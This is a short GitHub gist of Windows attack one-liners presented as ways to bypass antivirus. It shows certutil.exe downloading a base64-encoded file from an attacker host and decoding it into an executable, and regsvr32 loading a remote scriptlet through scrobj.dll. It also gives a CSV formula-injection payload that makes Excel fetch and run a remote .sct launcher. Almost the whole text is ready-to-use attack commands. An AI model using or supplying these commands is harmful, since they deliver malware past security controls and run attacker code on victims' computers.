Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# certutil.exe bypass av on download + base64 Decoding
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file
#into the executable. https://www.browserling.com/tools/file-to-base64
#This is illustrated in Xavier Mertens handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# certutil.exe bypass av on download - dll injection from regsvr32.exe
#https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /I:file.blah scrub.dll
#csv malware injection
#https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.